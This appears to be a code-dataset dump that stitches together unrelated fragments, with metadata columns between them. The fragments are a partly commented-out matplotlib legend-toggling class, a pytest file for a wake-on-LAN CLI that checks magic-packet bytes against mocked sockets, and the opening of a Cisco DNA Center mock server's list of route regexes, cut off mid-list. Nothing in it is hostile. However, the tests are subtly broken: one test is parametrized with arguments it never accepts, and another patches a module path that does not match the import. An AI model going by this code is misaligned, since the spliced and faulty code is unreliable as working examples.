# plot.set_label(lbl)
# i += 1
# update default legend props with user specified props
lkw = self._default_legend
lkw.update(legendkw)
# create the legend
# print('PING!!'*10 )
# embed()
# self.legend = ax.legend( plots, labels, **lkw )
self.legend = ax.legend(**lkw)
if self.legend: # if no labels --> no legend, and we are done!
# create mapping between the picked legend artists (markers), and the
# original (axes) artists
self.to_orig = {}
# self.to_leg = {}
# self.to_handle = {}
# enable legend picking by setting the picker method
for handel, origart in zip(self.legend.legendHandles, plots): # get_lines()
handel.set_pickradius(10)
self.to_orig[handel] = origart
# self.to_leg[handel] = handel
# self.to_handle[origart[0]] = handel
# self.connect()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@mpl_connect('pick_event')
def on_pick(self, event):
'''Pick event handler.'''
# print('RARARARA', event.artist)
if event.artist in self.to_orig:
self.toggle_vis(event)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# @unhookPyQt
def toggle_vis(self, event):
'''
on the pick event, find the orig line corresponding to the
legend proxy line, and toggle the visibility.
'''
# Toggle vis of axes artists
art = self.to_orig[event.artist]
vis = not art.get_visible()
art.set_visible(vis)
# set alpha of legend artist
art = event.artist
art.set_alpha(1.0 if vis else 0.2)
# TODO: BLIT
self.canvas.draw()
# class DynamicLegend(ConnectionMixin): # TODO: move to seperate script....
# # TODO: subclass Legend??
# '''
# Enables toggling marker / bar / cap visibility by selecting on the legend.
# '''
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# _default_legend = dict(fancybox=True,
# framealpha=0.5,
# handler_map={ErrorbarContainer:
# ReorderedErrorbarHandler(numpoints=1)})
# label_map = {ErrorbarContainer: 'errorbar{}',
# Line2D: 'line{}'}
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# def __init__(self, ax, plots, legendkw={}):
# '''enable legend picking'''
#
# # initialize auto-connect
# ConnectionMixin.__init__(self, ax.figure)
#
# # Auto-generate labels
# # NOTE: This needs to be done to enable legend picking. if the artists
# # are unlabeled, no legend will be created and we therefor cannot pick them!
# i = 0
# for plot in plots:
# if not plot.get_label():
# lbl = self.label_map[type(plot)].format(i)
# plot.set_label(lbl)
# i += 1
#
# # update default legend props with user specified props
# lkw = self._default_legend
# lkw.update(legendkw)
#
# # create the legend
#
# # print('PING!!'*10 )
# # embed()
#
# # self.legend = ax.legend( plots, labels, **lkw )
# self.legend = ax.legend(**lkw)
#
# if self.legend: # if no labels --> no legend, and we are done!
# # create mapping between the picked legend artists (markers), and the
# # original (axes) artists
# self.to_orig = {}
# self.to_leg = {}
# self.to_handle = {}
#
# # enable legend picking by setting the picker method
# for handel, origart in zip(self.legend.legendHandles, plots): # get_lines()
# self.to_orig[handel.markers] = NamedErrorbarContainer(origart)
# self.to_leg[handel.markers] = handel
# self.to_handle[origart[0]] = handel
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# @mpl_connect('pick_event')
# def on_pick(self, event):
# '''Pick event handler.'''
# if event.artist in self.to_orig:
# self.toggle_vis(event)
#
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # @unhookPyQt
# def toggle_vis(self, event):
# '''
# on the pick event, find the orig line corresponding to the
# legend proxy line, and toggle the visibility.
# '''
#
# def get_part(mapping, event):
# part = getattr(mapping[event.artist], event.part)
#
# if event.part in ('stems', 'caps'):
# artists = getattr(part, event.partxy)
# else:
# artists = part
#
# yield from flatten([artists])
#
# for art in get_part(self.to_orig, event):
# vis = not art.get_visible()
# art.set_visible(vis)
#
# for art in get_part(self.to_leg, event):
# art.set_alpha(1.0 if vis else 0.2)
#
# # FIXME UnboundLocalError: local variable 'vis' referenced before assignment
# # TODO: BLIT
# self.canvas.draw() | 38.11413 | 111 | 0.477542 | 674 | 7,013 | 4.85905 | 0.218101 | 0.031145 | 0.024427 | 0.021985 | 0.801221 | 0.774351 | 0.774351 | 0.741985 | 0.741985 | 0.720611 | 0 | 0.006019 | 0.31299 | 7,013 | 184 | 112 | 38.11413 | 0.673724 | 0.741338 | 0 | 0 | 0 | 0 | 0.006223 | 0 | 0 | 0 | 0 | 0.01087 | 0 | 1 | 0.107143 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1eeddb65ebb71a4f7897ace85bb8b5cf1aa2284b | 6,329 | py | Python | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | tests/test_wolproxycli.py | bateman/wolproxypycli | be9677939ea14880b5405a78457deecdfad79eba | [
"MIT"
] | null | null | null | """Unit tests for the core module."""
import socket
from unittest.mock import Mock, call, patch
import pytest
import wolproxypycli.main as wolproxy
@pytest.mark.parametrize(
"mac,packet",
[
(
"000000000000",
b"\xff\xff\xff\xff\xff\xff"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00",
),
(
"01:23:45:67:89:ab",
b"\xff\xff\xff\xff\xff\xff"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab"
b"\x01#Eg\x89\xab",
),
(
"ff-ff-ff-ff-ff-ff",
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff",
),
],
ids=["no separator", "colons", "hyphens"],
)
@patch("socket.socket")
def test_wol(sock: Mock) -> None:
"""Test whether the magic packets are broadcasted to the specified network."""
wolproxy.wol("133713371337", ip="example.com", port=7)
assert sock.mock_calls == [
call(socket.AF_INET, socket.SOCK_DGRAM),
call().__enter__(),
call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
call().__enter__().connect(("example.com", 7)),
call()
.__enter__()
.send(
b"\xff\xff\xff\xff\xff\xff"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
),
call().__exit__(None, None, None),
]
@patch("socket.socket")
def test_wol_default(sock: Mock) -> None:
"""Test whether the magic packets are broadcasted using default values."""
wolproxy.wol("133713371337")
assert sock.mock_calls == [
call(socket.AF_INET, socket.SOCK_DGRAM),
call().__enter__(),
call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
call().__enter__().connect(("255.255.255.255", 9)),
call()
.__enter__()
.send(
b"\xff\xff\xff\xff\xff\xff"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
),
call().__exit__(None, None, None),
]
@patch("socket.socket")
def test_wol_interface(sock: Mock) -> None:
"""Test whether the magic packets are broadcasted to the specified network via specified interface."""
wolproxy.wol(
"133713371337",
ip="example.com",
port=7,
interface="192.168.0.2",
)
assert sock.mock_calls == [
call(socket.AF_INET, socket.SOCK_DGRAM),
call().__enter__(),
call().__enter__().bind(("192.168.0.2", 0)),
call().__enter__().setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1),
call().__enter__().connect(("example.com", 7)),
call()
.__enter__()
.send(
b"\xff\xff\xff\xff\xff\xff"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
b"\x137\x137\x137"
),
call().__exit__(None, None, None),
]
@patch("wolproxy_py.main.wol")
def test_main(wol: Mock) -> None:
"""Test if processed arguments are passed to send_magic_packet."""
wolproxy.wolproxy_cli(["00:11:22:33:44:55", "-i", "host.example", "-p", "1337"])
wolproxy.wolproxy_cli(["00:11:22:33:44:55", "-i", "host.example", "-p", "1337", "-n", "192.168.0.2"])
assert wol.mock_calls == [
call("00:11:22:33:44:55", ip="host.example", port=1337, interface=None),
call(
"00:11:22:33:44:55",
ip="host.example",
port=1337,
interface="192.168.0.2",
),
]
| 31.964646 | 106 | 0.497867 | 881 | 6,329 | 3.473326 | 0.119183 | 0.215686 | 0.258824 | 0.258824 | 0.866667 | 0.85 | 0.841176 | 0.841176 | 0.802614 | 0.802614 | 0 | 0.201212 | 0.322326 | 6,329 | 197 | 107 | 32.126904 | 0.512241 | 0.052299 | 0 | 0.752747 | 0 | 0 | 0.382619 | 0.152713 | 0 | 0 | 0 | 0 | 0.021978 | 1 | 0.021978 | false | 0 | 0.021978 | 0 | 0.043956 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
480c8ab24398b0f79f54ac721843ebb3bf2f544a | 248,626 | py | Python | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 32 | 2019-09-05T05:16:56.000Z | 2022-03-22T09:50:38.000Z | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 35 | 2019-09-07T18:58:54.000Z | 2022-03-24T19:29:36.000Z | tests/mock/server/v1_3_0.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | [
"MIT"
] | 18 | 2019-09-09T11:07:21.000Z | 2022-03-25T08:49:59.000Z | from http.server import BaseHTTPRequestHandler
import re
import json
import requests
class MockServerRequestHandler_v1_3_0(BaseHTTPRequestHandler):
AUTHENTICATION_ac8ae94c4e69a09d_PATTERN = re.compile(r"/dna/system/api/v1/auth/token")
TEMPLATE_PROGRAMMER_00aec9b1422ab27e_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_01b09a254b9ab259_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template")
TEMPLATE_PROGRAMMER_109d1b4f4289aecd_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_6099da82477b858a_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/deploy")
TEMPLATE_PROGRAMMER_7781fa0548a98342_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template")
TEMPLATE_PROGRAMMER_9480fa1f47ca9254_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project")
TEMPLATE_PROGRAMMER_a7b42836408a8e74_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/string")
TEMPLATE_PROGRAMMER_f393abe84989bb48_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/preview")
TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/version/string")
TEMPLATE_PROGRAMMER_62b05b2c40a9b216_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/version")
TEMPLATE_PROGRAMMER_83a3b9404cb88787_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/string")
TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project/string/template")
TEMPLATE_PROGRAMMER_9c9a785741cbb41f_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/template/deploy/status/string")
TEMPLATE_PROGRAMMER_d0a1abfa435b841d_PATTERN = re.compile(r"/dna/intent/api/v1/template-programmer/project/string")
TAG_00a2fa6146089317_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member")
TAG_1399891c42a8be64_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
TAG_429c28154bdaa13d_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string")
TAG_2e9db85840fbb1cf_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member/count")
TAG_4695090d403b8eaa_PATTERN = re.compile(r"/dna/intent/api/v1/tag/member/type")
TAG_45bc7a8344a8bc1e_PATTERN = re.compile(r"/dna/intent/api/v1/tag/member")
TAG_4d86a993469a9da9_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
TAG_8091a9b84bfba53b_PATTERN = re.compile(r"/dna/intent/api/v1/tag/count")
TAG_c1a359b14c89b573_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string")
TAG_eab7abe048fb99ad_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member")
TAG_caa3ea704d78b37e_PATTERN = re.compile(r"/dna/intent/api/v1/tag/string/member/string")
TAG_ee9aab01487a8896_PATTERN = re.compile(r"/dna/intent/api/v1/tag")
NETWORK_DISCOVERY_069d9823451b892d_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/count")
NETWORK_DISCOVERY_17929bc7465bb564_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/netconf")
NETWORK_DISCOVERY_10b06a6a4f7bb3cb_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-write-community")
NETWORK_DISCOVERY_1da5ebdd434aacfe_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv3")
NETWORK_DISCOVERY_47a1b84b4e1b8044_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-read-community")
NETWORK_DISCOVERY_33b799d04d0a8907_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/0/0")
NETWORK_DISCOVERY_3d9b99c343398a27_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/summary")
NETWORK_DISCOVERY_4d9ca8e2431a8a24_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-write")
NETWORK_DISCOVERY_44974ba5435a801d_PATTERN = re.compile(r"/dna/intent/api/v1/snmp-property")
NETWORK_DISCOVERY_4c8cab5f435a80f4_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string")
NETWORK_DISCOVERY_55b439dc4239b140_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_63bb88b74f59aa17_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string")
NETWORK_DISCOVERY_6bacb8d14639bdc7_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-write-community")
NETWORK_DISCOVERY_948ea8194348bc0b_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/cli")
NETWORK_DISCOVERY_89b36b4649999d81_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-read")
NETWORK_DISCOVERY_99872a134d0a9fb4_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/job")
NETWORK_DISCOVERY_979688084b7ba60d_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv3")
NETWORK_DISCOVERY_a5ac99774c6bb541_PATTERN = re.compile(r"/dna/intent/api/v1/snmp-property")
NETWORK_DISCOVERY_9788b8fc4418831d_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_b68a6bd8473a9a25_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-write")
NETWORK_DISCOVERY_c1ba9a424c08a01b_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/0/0")
NETWORK_DISCOVERY_db8e09234a988bab_PATTERN = re.compile(r"/dna/intent/api/v1/discovery")
NETWORK_DISCOVERY_a6965b454c9a8663_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device/count")
NETWORK_DISCOVERY_f5ac590c4ca9975a_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_fba0d80747eb82e8_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/cli")
NETWORK_DISCOVERY_bf859ac64a0ba19c_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/http-read")
NETWORK_DISCOVERY_c5acd9fa4c1a8abc_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/netconf")
NETWORK_DISCOVERY_58a3699e489b9529_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_709fda3c42b8877a_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/string")
NETWORK_DISCOVERY_7aa3da9d4e098ef2_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential/snmpv2-read-community")
NETWORK_DISCOVERY_a4967be64dfaaa1a_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/job")
NETWORK_DISCOVERY_a6b798ab4acaa34e_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device/0/0")
NETWORK_DISCOVERY_ff816b8e435897eb_PATTERN = re.compile(r"/dna/intent/api/v1/global-credential")
NETWORK_DISCOVERY_f6ac994f451ba011_PATTERN = re.compile(r"/dna/intent/api/v1/discovery/string/network-device")
TASK_26b44ab04649a183_PATTERN = re.compile(r"/dna/intent/api/v1/task/count")
TASK_a1a9387346ba92b1_PATTERN = re.compile(r"/dna/intent/api/v1/task/string")
TASK_e78bb8a2449b9eed_PATTERN = re.compile(r"/dna/intent/api/v1/task")
TASK_f5a269c44f2a95fa_PATTERN = re.compile(r"/dna/intent/api/v1/task/string/tree")
TASK_e487f8d3481b94f2_PATTERN = re.compile(r"/dna/intent/api/v1/task/operation/string/0/0")
COMMAND_RUNNER_33bb2b9d40199e14_PATTERN = re.compile(r"/dna/intent/api/v1/network-device-poller/cli/legit-reads")
COMMAND_RUNNER_d6b8ca774739adf4_PATTERN = re.compile(r"/dna/intent/api/v1/network-device-poller/cli/read-request")
FILE_3f89bbfc4f6b8b50_PATTERN = re.compile(r"/dna/intent/api/v1/file/namespace")
FILE_42b6a86e44b8bdfc_PATTERN = re.compile(r"/dna/intent/api/v1/file/namespace/string")
FILE_9698c8ec4a0b8c1a_PATTERN = re.compile(r"/dna/intent/api/v1/file/string")
PATH_TRACE_55bc3bf94e38b6ff_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis")
PATH_TRACE_7ab9a8bd4f3b86a4_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis/string")
PATH_TRACE_8a9d2b76443b914e_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis/string")
PATH_TRACE_a395fae644ca899c_PATTERN = re.compile(r"/dna/intent/api/v1/flow-analysis")
NON_FABRIC_WIRELESS_07913b7f4e1880de_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/provision")
NON_FABRIC_WIRELESS_20872aec43b9bf50_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_6896993e41b8bd7a_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/provision")
NON_FABRIC_WIRELESS_ae86a8c14b5980b7_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile/string")
NON_FABRIC_WIRELESS_47ba59204e0ab742_PATTERN = re.compile(r"/dna/intent/api/v1/wireless/profile")
NON_FABRIC_WIRELESS_db9f997f4e59aec1_PATTERN = re.compile(r"/dna/intent/api/v1/business/ssid")
NON_FABRIC_WIRELESS_c7a6592b4b98a369_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid/string")
NON_FABRIC_WIRELESS_cca098344a489dfa_PATTERN = re.compile(r"/dna/intent/api/v1/business/ssid/string/string")
NON_FABRIC_WIRELESS_cca519ba45ebb423_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid")
NON_FABRIC_WIRELESS_8a96fb954d09a349_PATTERN = re.compile(r"/dna/intent/api/v1/enterprise-ssid")
FABRIC_WIRED_1e80bb50430b8634_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device/string")
FABRIC_WIRED_a4b56a5f478a97dd_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device")
FABRIC_WIRED_d0b3593c4a7aaf22_PATTERN = re.compile(r"/dna/intent/api/v1/business/sda/border-device/string")
DEVICES_0db7da744c0b83d8_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module/string")
DEVICES_1c894b5848eab214_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string")
DEVICES_3b9ef9674429be4c_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/sync")
DEVICES_20b19b52464b8972_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_288df9494f2a9746_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/vlan")
DEVICES_38bd0b884b89a785_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/collection-schedule/global")
DEVICES_349c888443b89a58_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/0/0")
DEVICES_3d923b184dc9a4ca_PATTERN = re.compile(r"/dna/intent/api/v1/interface/count")
DEVICES_4bb22af046fa8f08_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_4eb56a614cc9a2d2_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/interface-name")
DEVICES_5b8639224cd88ea7_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string/count")
DEVICES_5db21b8e43fab7d8_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/count")
DEVICES_70ad397649e9b4d3_PATTERN = re.compile(r"/dna/intent/api/v1/interface/ospf")
DEVICES_82918a1b4d289c5c_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/collection-schedule")
DEVICES_84b37ae54c59ab28_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/meraki-organization")
DEVICES_81bb4804405a8d2f_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/functional-capability/string")
DEVICES_84ad8b0e42cab48a_PATTERN = re.compile(r"/dna/intent/api/v1/interface/isis")
DEVICES_84b33a9e480abcaf_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/config")
DEVICES_819f9aa54feab7bf_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/brief")
DEVICES_8fa8eb404a4a8d96_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string")
DEVICES_ba9dc85b4b8a9a17_PATTERN = re.compile(r"/dna/intent/api/v1/interface/network-device/string")
DEVICES_c9809b6744f8a502_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/tenantinfo/macaddress")
DEVICES_b9855ad54ae98156_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/brief")
DEVICES_b7bcaa084e2b90d0_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/config")
DEVICES_cd98780f4888a66d_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/file")
DEVICES_cd8469e647caab0e_PATTERN = re.compile(r"/dna/intent/api/v1/interface/ip-address/string")
DEVICES_d0a4b88145aabb51_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/ip-address/string")
DEVICES_888f585c49b88441_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/config/count")
DEVICES_d888ab6d4d59a8c1_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/serial-number/string")
DEVICES_f5947a4c439a8bf0_PATTERN = re.compile(r"/dna/intent/api/v1/interface")
DEVICES_8db939744649a782_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module/count")
DEVICES_eb8249e34f69b0f1_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/module")
DEVICES_f6826a8e41bba242_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/string/wireless-info")
DEVICES_aeb9eb67460b92df_PATTERN = re.compile(r"/dna/intent/api/v1/network-device")
DEVICES_b888792d43baba46_PATTERN = re.compile(r"/dna/intent/api/v1/interface/string")
DEVICES_c3b3c9ef4e6b8a09_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/functional-capability")
DEVICES_89b2fb144f5bb09b_PATTERN = re.compile(r"/dna/intent/api/v1/device-detail")
DEVICES_f49548c54be8a3e2_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/0/0")
DEVICES_ffa748cc44e9a437_PATTERN = re.compile(r"/dna/intent/api/v1/network-device/autocomplete")
SITES_17a82ac94cf99ab0_PATTERN = re.compile(r"/dna/intent/api/v1/site-health")
SITES_33aab9b842388023_PATTERN = re.compile(r"/dna/intent/api/v1/site/string")
SITES_23896b124bd8b9bf_PATTERN = re.compile(r"/dna/intent/api/v1/site")
SITES_209509d247599e19_PATTERN = re.compile(r"/dna/intent/api/v1/site")
SITES_92acda91406aa050_PATTERN = re.compile(r"/dna/intent/api/v1/site/string")
SITES_d9bdb9034df99dba_PATTERN = re.compile(r"/dna/intent/api/v1/site/count")
SITES_eeb168eb41988e07_PATTERN = re.compile(r"/dna/system/api/v1/site/string/device")
SITES_eba669054e08a60e_PATTERN = re.compile(r"/dna/intent/api/v1/membership")
NETWORKS_6284db4649aa8d31_PATTERN = re.compile(r"/dna/intent/api/v1/topology/vlan/vlan-names")
NETWORKS_9ba14a9e441b8a60_PATTERN = re.compile(r"/dna/intent/api/v1/topology/site-topology")
NETWORKS_b2b8cb91459aa58f_PATTERN = re.compile(r"/dna/intent/api/v1/topology/physical-topology")
NETWORKS_b9b48ac8463a8aba_PATTERN = re.compile(r"/dna/intent/api/v1/topology/l2/string")
NETWORKS_c2b5fb764d888375_PATTERN = re.compile(r"/dna/intent/api/v1/topology/l3/string")
NETWORKS_ca91da84401abba1_PATTERN = re.compile(r"/dna/intent/api/v1/network-health")
CLIENTS_149aa93b4ddb80dd_PATTERN = re.compile(r"/dna/intent/api/v1/client-health")
CLIENTS_e2adba7943bab3e9_PATTERN = re.compile(r"/dna/intent/api/v1/client-detail")
PNP_0b836b7b4b6a9fd5_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/unclaim")
PNP_0a9c988445cb91c8_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/sacct/string/vacct/string/sync-result")
PNP_09b0f9ce4239ae10_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_2499e9ad42e8ae5b_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/vacct")
PNP_1e962af345b8b59f_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/savacct")
